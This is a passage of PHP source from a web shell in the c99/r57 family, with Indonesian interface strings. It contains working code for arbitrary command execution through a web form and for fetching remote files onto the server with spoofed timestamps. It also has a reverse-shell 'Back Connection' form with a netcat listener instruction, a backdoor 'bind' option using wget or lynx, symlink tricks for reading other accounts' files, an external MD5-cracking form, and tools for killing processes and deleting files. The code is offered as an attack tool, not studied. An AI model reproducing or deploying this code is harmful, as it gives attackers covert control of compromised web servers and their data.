  1945.      while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
  1946.    }
  1947.     if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url!<br>";
  1948.     } else {
  1949.     $st = getmicrotime();
  1950.     $content = @file_get_contents($uploadurl);
  1951.     $dt = round(getmicrotime()-$st,4);
  1952.     if (!$content) {$uploadmess .=  "Can't download file!<br>";
  1953.     } else {
  1954.     if ($filestealth) {$stat = stat($uploadpath.$destin);}
  1955.     $fp = fopen($uploadpath.$destin,"w");
  1956.     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";
  1957.     } else {
  1958.     fwrite($fp,$content,strlen($content));
  1959.     fclose($fp);
  1960.     if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
  1961.      }
  1962.     }
  1963.    }
  1964.   }
  1965.  }
  1966.  if ($miniform)
  1967.  {
  1968.   echo "".$uploadmess."";
  1969.   $xtux = "ls";
  1970. } else {
  1971. echo "File upload:<br>".$uploadmess."<form enctype=\"multipart/form-data\" action=\"".$surl."xtux=upload&d=".urlencode($d)."\" method=POST>
  1972. Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br> or <br>
  1973. Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
  1974. Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
  1975. File-name (auto-fill): <input name=uploadfilename size=25><br><br>
  1976. <input type=checkbox name=uploadautoname value=1 id=df4> convert file name to lovercase<br><br>
  1977. <input type=submit name=submit value=\"Upload\">
  1978. </form>";
  1979.  }
  1980. }
  1981. if ($xtux == "delete")
  1982. {
  1983.  $delerr = "";
  1984.  foreach ($xtuxbox as $v)
  1985.  {
  1986.   $result = FALSE;
  1987.   $result = fs_rmobj($v);
  1988.   if (!$result) {$delerr .= "Gabisa ".htmlspecialchars($v)."<br>";}
  1989.  }
  1990.  if (!empty($delerr)) {echo "Rusak :<br>".$delerr;}
  1991.  $xtux = "ls";
  1992. }
  1993. if (!$usefsbuff)
  1994. {
  1995. if (($xtux == "paste") or ($xtux == "copy") or ($xtux == "cut") or ($xtux == "unselect")) {echo "<center>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";}
  1996. } else { if ($xtux == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$xtuxbox); c99_sess_put($sess_data); $xtux = "ls"; }
  1997. elseif ($xtux == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$xtuxbox); c99_sess_put($sess_data); $xtux = "ls";}
  1998. elseif ($xtux == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$xtuxbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$xtuxbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $xtux = "ls";}
  1999. if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
  2000. elseif ($actpastebuff)
  2001. {
  2002. $psterr = "";
  2003. foreach($sess_data["copy"] as $k=>$v)
  2004. {
  2005. $to = $d.basename($v);
  2006. if (!fs_copy_obj($v,$to)) {$psterr .= "Gabisa ".$v." to ".$to."!<br>";}
  2007. if ($copy_unset) {unset($sess_data["copy"][$k]);}
  2008. }
  2009. foreach($sess_data["cut"] as $k=>$v)
  2010. {
  2011. $to = $d.basename($v);
  2012. if (!fs_move_obj($v,$to)) {$psterr .= "Gabisa ".$v." to ".$to."!<br>";}
  2013. unset($sess_data["cut"][$k]);
  2014. }
  2015. c99_sess_put($sess_data);
  2016. if (!empty($psterr)) {echo "Rusak :<br>".$psterr;}
  2017. $xtux = "ls";
  2018. }
  2019. elseif ($actpastebuff)
  2020. {
  2021. $arcerr = "";
  2022. if (substr($actpastebuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";
  2023. } else { $ext = ".tar.gz";}
  2024. if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
  2025. $cmdline .= " ".$actpastebuff_path;
  2026. $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
  2027. foreach($objects as $v)
  2028. {
  2029. $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
  2030. if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
  2031. if (is_dir($v))
  2032. {
  2033. if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
  2034. $v .= "*";
  2035. }
  2036. $cmdline .= " ".$v;
  2037. }
  2038. $tmp = realpath(".");
  2039. chdir($d);
  2040. $ret = o2xdaexec($cmdline);
  2041. chdir($tmp);
  2042. if (empty($ret)) {$arcerr .= "Gabisa (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
  2043. $ret = str_replace("\r\n","\n",$ret);
  2044. $ret = explode("\n",$ret);
  2045. if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
  2046. foreach($sess_data["cut"] as $k=>$v)
  2047. {
  2048. if (in_array($v,$ret)) {fs_rmobj($v);}
  2049. unset($sess_data["cut"][$k]);
  2050. }
  2051. c99_sess_put($sess_data);
  2052. if (!empty($arcerr)) {echo "File Double :<br>".$arcerr;}
  2053. $xtux = "ls";
  2054. }
  2055. elseif ($actpastebuff)
  2056. {
  2057. $psterr = "";
  2058. foreach($sess_data["copy"] as $k=>$v)
  2059.   {
  2060.    $to = $d.basename($v);
  2061.    if (!fs_copy_obj($v,$d)) {$psterr .= "Gabisa ".$v." to ".$to."!<br>";}
  2062.    if ($copy_unset) {unset($sess_data["copy"][$k]);}
  2063.   }
  2064.   foreach($sess_data["cut"] as $k=>$v)
  2065.   {
  2066.    $to = $d.basename($v);
  2067.    if (!fs_move_obj($v,$d)) {$psterr .= "Gabisa ".$v." to ".$to."!<br>";}
  2068.    unset($sess_data["cut"][$k]);
  2069.   }
  2070.   c99_sess_put($sess_data);
  2071.   if (!empty($psterr)) {echo "Error :<br>".$psterr;}
  2072.   $xtux = "ls";
  2073.  }
  2074. }
  2075. if ($xtux == "cmd")
  2076. {
  2077. if (trim($cmd) == "ps -aux") {$xtux = "processes";}
  2078. elseif (trim($cmd) == "tasklist") {$xtux = "processes";
  2079. } else {
  2080.  @chdir($chdir);
  2081. if (!empty($submit))
  2082. {
  2083. echo "Hasil:<br>";
  2084. $olddir = realpath(".");
  2085. @chdir($d);
  2086. $ret = o2xdaexec($cmd);
  2087.   $ret = convert_cyr_string($ret,"d","w");
  2088. if ($cmd_txt)
  2089. {
  2090. $rows = count(explode("\r\n",$ret))+1;
  2091. if ($rows < 10) {$rows = 10;}
  2092. echo "<br><textarea cols=\"180\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
  2093. } else {
  2094. echo $ret."<br>";}
  2095. @chdir($olddir);
  2096. } else {
  2097. echo "Execution command"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
  2098. echo "<form action=\"".$surl."\" method=POST><input type=hidden name=xtux value=cmd><textarea name=cmd cols=180 rows=1>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
  2099. }
  2100. }
  2101. if ($xtux == "ls")
  2102. {
  2103. if (count($ls_arr) > 0) {$list = $ls_arr;
  2104. } else {
  2105. $list = array();
  2106. if ($h = @opendir($d))
  2107. {
  2108. while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
  2109. closedir($h);
  2110. } else {
  2111.     }
  2112.     }
  2113. if (count($list) == 0) {echo "<center>Ga bisa buka folder (".htmlspecialchars($d).")!</center>";
  2114. } else {
  2115. //Building array
  2116. $objects = array();
  2117. $vd = "f"; //Viewing mode
  2118. if ($vd == "f") {
  2119. $objects["head"] = array();
  2120. $objects["folders"] = array();
  2121. $objects["links"] = array();
  2122. $objects["files"] = array();
  2123. foreach ($list as $v)
  2124. {
  2125. $o = basename($v);
  2126. $row = array();
  2127. if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
  2128. elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
  2129. elseif (is_dir($v))
  2130. {
  2131. if (is_link($v)) {$type = "LINK";
  2132. } else {
  2133. $type = "DIR";}
  2134. $row[] = $v;
  2135. $row[] = $type;
  2136. }
  2137. elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
  2138. $row[] = filemtime($v);
  2139. if (!$win) {
  2140. $ow = posix_getpwuid(fileowner($v));
  2141. $gr = posix_getgrgid(filegroup($v));
  2142. $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
  2143. }
  2144.     $row[] = fileperms($v);
  2145.     if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
  2146.     elseif (is_link($v)) {$objects["links"][] = $row;}
  2147.     elseif (is_dir($v)) {$objects["folders"][] = $row;}
  2148.     elseif (is_file($v)) {$objects["files"][] = $row;}
  2149.     $i++;
  2150.    }
  2151.    $row = array();
  2152.    $row[] = "Name";
  2153.    $row[] = "Size";
  2154.    $row[] = "Modify";
  2155. if (!$win) {
  2156.    $row[] = "Owner/Group";}
  2157.    $row[] = "Perms";
  2158.    $row[] = "Action";
  2159.    $parsesort = parsesort($sort);
  2160.    $sort = $parsesort[0].$parsesort[1];
  2161.    $k = $parsesort[0];
  2162.    if ($parsesort[1] != "a") {$parsesort[1] = "d";}
  2163.    $y = "<a href=\"".$surl."xtux=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
  2164.    $y .= "<img src=\"".$surl."xtux=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>";
  2165.    $row[$k] .= $y;
  2166.    for($i=0;$i<count($row)-1;$i++)
  2167.    {
  2168.     if ($i != $k) {$row[$i] = "<a href=\"".$surl."xtux=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
  2169.    }
  2170.    $v = $parsesort[0];
  2171.    usort($objects["folders"], "tabsort");
  2172.    usort($objects["links"], "tabsort");
  2173.    usort($objects["files"], "tabsort");
  2174.    if ($parsesort[1] == "d")
  2175.    {
  2176.     $objects["folders"] = array_reverse($objects["folders"]);
  2177.     $objects["files"] = array_reverse($objects["files"]);
  2178.    }
  2179.    $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
  2180.    $tab = array();
  2181.    $tab["cols"] = array($row);
  2182.    $tab["head"] = array();
  2183.    $tab["folders"] = array();
  2184.    $tab["links"] = array();
  2185.    $tab["files"] = array();
  2186.    $i = 0;
  2187.    foreach ($objects as $a)
  2188.    {
  2189.     $v = $a[0];
  2190.     $o = basename($v);
  2191.     $dir = dirname($v);
  2192.     if ($disp_fullpath) {$disppath = $v;}
  2193.     else {$disppath = $o;}
  2194.     $disppath = str2mini($disppath,60);
  2195.     if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
  2196.     elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
  2197.     foreach ($regxp_highlight as $r)
  2198.     {
  2199.      if (ereg($r[0],$o))
  2200.      {
  2201.       if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Konfigurasi error \$regxp_highlight[".$k."][0] - unknown command."; TuXexit();
  2202.     } else {
  2203.        $r[1] = round($r[1]);
  2204.        $isdir = is_dir($v);
  2205.        if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
  2206.        {
  2207.         if (empty($r[2])) {$r[2] = ""; $r[3] = "";}
  2208.         $disppath = $r[2].$disppath.$r[3];
  2209.         if ($r[4]) {break;}
  2210.        }
  2211.       }
  2212.      }
  2213.     }
  2214.     $uo = urlencode($o);
  2215.     $ud = urlencode($dir);
  2216.     $uv = urlencode($v);
  2217.     $row = array();
  2218.     if ($o == ".")
  2219.     {
  2220.      $row[] = "<font face=wingdings size=-1>Dir</font> <a href=\"".$surl."xtux=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
  2221.      $row[] = "LINK";
  2222.     }
  2223.     elseif ($o == "..")
  2224.     {
  2225.      $row[] = "<font face=wingdings size=-1>Dir</font> <a href=\"".$surl."xtux=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
  2226.      $row[] = "LINK";
  2227.     }
  2228.     elseif (is_dir($v))
  2229.     {
  2230.      if (is_link($v))
  2231.      {
  2232.     $disppath .= " => ".readlink($v);
  2233.     $type = "LINK";
  2234.     $row[] =  "<font face=wingdings size=-1>Dir</font> <a href=\"".$surl."xtux=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
  2235.     } else {
  2236.     $type = "DIR";
  2237.     $row[] =  "<font face=wingdings size=-1>Dir</font> <a href=\"".$surl."xtux=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
  2238.       }
  2239.      $row[] = $type;
  2240.     }
  2241.     elseif(is_file($v))
  2242.     {
  2243.      $ext = explode(".",$o);
  2244.      $c = count($ext)-1;
  2245.      $ext = $ext[$c];
  2246.      $ext = strtolower($ext);
  2247.      $row[] =  "<font face=wingdings size=-2>File</font> <a href=\"".$surl."xtux=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
  2248.      $row[] = view_size($a[1]);
  2249.     }
  2250.     $row[] = date("d.m.Y H:i:s",$a[2]);
  2251.     if (!$win) {$row[] = $a[3];}
  2252.     $row[] = "<a href=\"".$surl."xtux=chmod&f=".$uo."&d=".$ud."\">".view_perms_color($v)."</a>";
  2253.     if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"xtuxbox[]\" onclick=\"ls_reverse_all();\">"; $i--;
  2254.     }else {
  2255.     $checkbox = "<input type=\"checkbox\" name=\"xtuxbox[]\" id=\"xtuxbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
  2256.     if (is_dir($v)) {$row[] = "<a href=\"".$surl."xtux=d&d=".$uv."\">Info</a> ".$checkbox;
  2257.     } else {
  2258.     $row[] = "<a href=\"".$surl."xtux=f&f=".$uo."&ft=info&d=".$ud."\">Info</a> &#8776;
  2259.     <a href=\"".$surl."xtux=f&f=".$uo."&ft=edit&d=".$ud."\">Edit</a> &#8776;
  2260.     <a href=\"".$surl."xtux=f&f=".$uo."&ft=download&d=".$ud."\">Download</a> ".$checkbox;}
  2261.     if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
  2262.     elseif (is_link($v)) {$tab["links"][] = $row;}
  2263.     elseif (is_dir($v)) {$tab["folders"][] = $row;}
  2264.     elseif (is_file($v)) {$tab["files"][] = $row;}
  2265.     $i++;
  2266.    }
  2267.   }
  2268. // Compiling table
  2269. $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
  2270. echo "<center>Daftar (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders)</center><br>
  2271. <TABLE cellSpacing=0 cellPadding=0 width=100% bgcolor=transparent borderColorLight=#990000 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=xtux value=".$dspact."><input type=hidden name=d value=".$d.">";
  2272. foreach($table as $row)
  2273.   {
  2274.    echo "<tr>\r\n";
  2275.    foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
  2276.    echo "</tr>\r\n";
  2277.   }
  2278.   echo "</table><hr size=\"1\" noshade><p align=\"right\">
  2279.  <script>
  2280.  function ls_setcheckboxall(status)
  2281.  {
  2282.   var id = 1;
  2283.   var num = ".(count($table)-2).";
  2284.   while (id <= num)
  2285.   {
  2286.    document.getElementById('xtuxbox'+id).checked = status;
  2287.    id++;
  2288.   }
  2289.  }
  2290.  function ls_reverse_all()
  2291.  {
  2292.   var id = 1;
  2293.   var num = ".(count($table)-2).";
  2294.   while (id <= num)
  2295.   {
  2296.    document.getElementById('xtuxbox'+id).checked = !document.getElementById('xtuxbox'+id).checked;
  2297.    id++;
  2298.   }
  2299.  }
  2300.  </script>
  2301.  <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\"> <input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\">  
  2302.     <b>&#8776; ";
  2303.   if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
  2304.   {
  2305.    echo "<input type=submit name=\"actpastebuff\" value=\"Pack buffer to archive\"> <input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\"> <input type=submit name=\"actpastebuff\" value=\"Paste\"> <input type=submit name=\"actemptybuff\" value=\"Empty buffer\">";
  2306.   }
  2307.   echo "<select name=xtux><option value=\"".$act."\">With selected:</option>";
  2308.   echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
  2309.   echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
  2310.   if ($usefsbuff)
  2311.   {
  2312.    echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
  2313.    echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
  2314.    echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
  2315.   }
  2316.   echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>";
  2317.   echo "</form>";
  2318.  }
  2319. }
  2320. if ($xtux == "tools")
  2321. {
  2322. ?>
  2323. <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#990000 cellPadding=5 height="116" width="100%" bgcolor=transparent borderColorLight=#c0c0c0 border=1>
  2324. <tr><td height="1" valign="top" colspan="2"><p align="center">:: <a href="<?php echo $surl; ?>xtux=tools">r57 Bind</a> ::</p></td></tr>
  2325. <tr><td width="50%" height="83" valign="top"><center><div align="center"></div><form action="<?php echo $surl; ?>">Bind With Backd00r Burner<br/>
  2326.     <form action="<?php echo $surl;?>">
  2327.     <input type=hidden name=xtux value=tools>
  2328.     <select size=\"1\" name=dolma><option value="wgetcan">Use Wget</option>
  2329.     <option value="lynxcan">Use lynx -dump</option>
  2330.     <option value="freadcan">Use Fread</option></select><br/><br/>
  2331.     <input type="submit" value="Burn it bAby"></form>
  2332. </td>
  2333. <td width="50%" height="83" valign="top"><center>Back Connection<br/><form action="<?php echo $surl;?>"> Ip (default is your ip) :<br/>
  2334.     <input type=hidden name=xtux value=tools>
  2335.     <input type="text" name="ipi" value="<?echo getenv('REMOTE_ADDR');?>"><br/>Port:<br/>
  2336.     <input type="text" name="pipi" value="4392"><br/>
  2337.     <input type="submit" value="C0nnect ->"></form><br/>
  2338.     Click "Connect" only after open port for it. You should use NetCat&copy;, run "nc -l -n -v -p <?php echo $bc_port; ?>"!<br><br></center></td></tr></TABLE>
  2339. <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#990000 cellPadding=5 height="116" width="100%" bgcolor=transparent borderColorLight=#c0c0c0 border=1>
  2340. <tr><td height="1" valign="top" colspan="2"><p align="center">:: <a href="<?php echo $surl; ?>xtux=tools">Mass MD5 Online Cracker & Symlink</a> ::</p></td></tr>
  2341. <tr><td width="50%" height="83" valign="top"><center><div align="center">MASS MD5 Online Cracker
  2342.     <form method="POST" action="http://www.hashchecker.de/hash.cgi">
  2343.     <input type="hidden" name="action" value="check">
  2344.     <textarea type="text" name="hash" cols="60" rows="12"></textarea></br>
  2345.     <input type="submit" value="Suchen" onclick="this.form.target='_blank';return true;"></form></div></td>
  2346. <td width="50%" height="83" valign="top"><center>
  2347. <form method=post action="<?php echo $surl; ?>">
  2348. <p align="center">SymLink With PHP<br><input name=ad1syp size=50> TO <input value="<?php echo $real."/symlink.txt" ?>" name=ad2syp size=50><br>
  2349. <input type=submit value=SymLink!></form><br /><br /><br />
  2350. <form method=post action=action="<?php echo $surl; ?>">
  2351. <p align="center">SymLink With OS <br><input name=ad1syc size=50> TO <input value="<?php echo $real."/symlink.txt" ?>" name=ad2syc size=50><br>
  2352. <input type=submit value=SymLink!></p></form><br /><br /><br /></center></td></tr></TABLE>
  2353. <?php
  2354.  
  2355. }
  2356. if ($xtux == "processes")
  2357. {
  2358.  echo "Processes:<br>";
  2359.     if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":""); } else {
  2360. $handler = "tasklist";}
  2361. $ret = o2xdaexec($handler);
  2362.     if (!$ret) {echo "Can't execute \"".$handler."\"!"; } else {
  2363.     if (empty($processes_sort)) {$processes_sort = $sort_default;}
  2364. $parsesort = parsesort($processes_sort);
  2365.     if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
  2366. $k = $parsesort[0];
  2367.     if ($parsesort[1] != "a") {
  2368. $y = "<a href=\"".$surl."xtux=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."xtux=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>"; } else {
  2369. $y = "<a href=\"".$surl."xtux=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."xtux=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>"; }
  2370. $ret = htmlspecialchars($ret);
  2371.   if (!$win)
  2372.   {
  2373.    if ($pid)
  2374.    {
  2375.     if (is_null($sig)) {$sig = 9;}
  2376.     echo "Sending signal ".$sig." to #".$pid."... ";
  2377.     if (posix_kill($pid,$sig)) { echo "OK."; } else {
  2378.     echo "ERROR."; }
  2379.    }
  2380.    while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
  2381.    $stack = explode("\n",$ret);
  2382.    $head = explode(" ",$stack[0]);
  2383.    unset($stack[0]);
  2384.    for($i=0;$i<count($head);$i++)
  2385.    {
  2386.     if ($i != $k) {$head[$i] = "<a href=\"".$surl."xtux=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\">".$head[$i]."</a>";}
  2387.    }
  2388.    $prcs = array();
  2389.    foreach ($stack as $line)
  2390.    {
  2391.     if (!empty($line))
  2392. {
  2393.  echo "<tr>";
  2394.      $line = explode(" ",$line);
  2395.      $line[10] = join(" ",array_slice($line,10));
  2396.      $line = array_slice($line,0,11);
  2397.      if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
  2398.      $line[] = "<a href=\"".$surl."xtux=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
  2399.      $prcs[] = $line;
  2400.      echo "</tr>";
  2401.     }
  2402.    }
  2403.   } else {
  2404.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2405.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2406.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2407.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2408.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2409.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2410.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2411.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2412.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2413.    while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
  2414.    while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  2415.    $ret = convert_cyr_string($ret,"d","w");
  2416.    $stack = explode("\n",$ret);
  2417.    unset($stack[0],$stack[2]);
  2418.    $stack = array_values($stack);
  2419.    $head = explode("",$stack[0]);
  2420.    $head[1] = explode(" ",$head[1]);
  2421.    $head[1] = $head[1][0];
  2422.    $stack = array_slice($stack,1);
  2423.    unset($head[2]);
  2424.    $head = array_values($head);
  2425.    if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."xtux=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."xtux=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
  2426.    else {$y = "<a href=\"".$surl."xtux=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."xtux=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
  2427.    if ($k > count($head)) {$k = count($head)-1;}
  2428.    for($i=0;$i<count($head);$i++)
  2429.    {
  2430.     if ($i != $k) {$head[$i] = "<a href=\"".$surl."xtux=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\">".trim($head[$i])."</a>";}
  2431.    }
  2432.    $prcs = array();
  2433.    foreach ($stack as $line)
  2434.    {
  2435.     if (!empty($line))
  2436.     {
  2437.      echo "<tr>";
  2438.      $line = explode("",$line);
  2439.      $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
  2440.      $line[2] = intval(str_replace(" ","",$line[2]))*1024;  
  2441.      $prcs[] = $line;
  2442.      echo "</tr>";
  2443.     }
  2444.    }
  2445.   }
  2446.   $head[$k] = "".$head[$k]."".$y;
  2447.   $v = $processes_sort[0];
  2448.   usort($prcs,"tabsort");
  2449.   if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
  2450.   $tab = array();
  2451.   $tab[] = $head;
  2452.   $tab = array_merge($tab,$prcs);
  2453.   echo "<TABLE height=1 cellSpacing=1 borderColorDark=#990000 cellPadding=5 width=\"95%\" bgcolor=transparent borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
  2454.   foreach($tab as $i=>$k)
  2455.   {
  2456.    echo "<tr>";
  2457.    foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
  2458.    echo "</tr>";
  2459.   }
  2460.   echo "</table>";
  2461.  }
  2462. }
  2463. if ($xtux == "f")
  2464. {
  2465.  if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
  2466.      {
  2467.     if (file_exists($d.$f)) {
  2468.     echo "<center>Permision denied (".htmlspecialchars($d.$f).")!</center>";
  2469.      } else {
  2470. echo "<center>File does not exists (".htmlspecialchars($d.$f).")!<br /><a href=\"".$surl."xtux=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
  2471. } else {
  2472. $r = @file_get_contents($d.$f);
  2473. $ext = explode(".",$f);
  2474. $c = count($ext)-1;
  2475. $ext = $ext[$c];
  2476. $ext = strtolower($ext);
  2477. $rft = "";
  2478.     foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
  2479.     if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
  2480.     if (empty($ft)) {$ft = $rft;}
  2481. $arr = array(
  2482.     array("Info","info"),
  2483.     array("HTML","html"),
  2484.     array("TXT","txt"),
  2485.     array("Code","code"),
  2486.     array("Session","phpsess"),
  2487.     array("EXE","exe"),
  2488.     array("SDB","sdb"),
  2489.     array("IMG","img"),
  2490.     array("INI","ini"),
  2491.     array("Download","download"),
  2492.     array("Notepad","notepad"),
  2493.     array("Edit","edit")
  2494. );
  2495.   echo "Viewing file: <font color=#00ff00>[ ".$ext." format ]</font> =&gt; ".$f." (".view_size(filesize($d.$f)).")".view_perms_color($d.$f)."<br />Select action/file-type:<br />";
  2496.   foreach($arr as $t)
  2497.   {
  2498.    if ($t[1] == $rft) {
  2499.     echo " <a href=\"".$surl."xtux=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";
  2500.     }
  2501.    elseif ($t[1] == $ft) {echo " <a href=\"".$surl."xtux=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><u>".$t[0]."</u></a>";
  2502.     } else {
  2503.     echo " <a href=\"".$surl."xtux=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\">".$t[0]."</a>";}
  2504.     echo " (<a href=\"".$surl."xtux=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
  2505.   }
  2506.   echo "<hr size=\"1\" noshade>";
  2507.   if ($ft == "info")
  2508.   {
  2509. echo "Information:<table border=0 cellspacing=1 cellpadding=2><tr><td>Path</td><td> ".$d.$f."</td></tr><tr><td>Size</td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td>MD5</td><td> ".md5_file($d.$f)."</td></tr>";
  2510.    if (!$win)
  2511.    {
  2512.     echo "<tr><td>Owner/Group</td><td> ";    
  2513.     $ow = posix_getpwuid(fileowner($d.$f));
  2514.     $gr = posix_getgrgid(filegroup($d.$f));
  2515.     echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
  2516.    }
  2517.    echo "<tr><td>Perms</td><td><a href=\"".$surl."xtux=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td>Create time</td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td>Access time</td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td>MODIFY time</td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
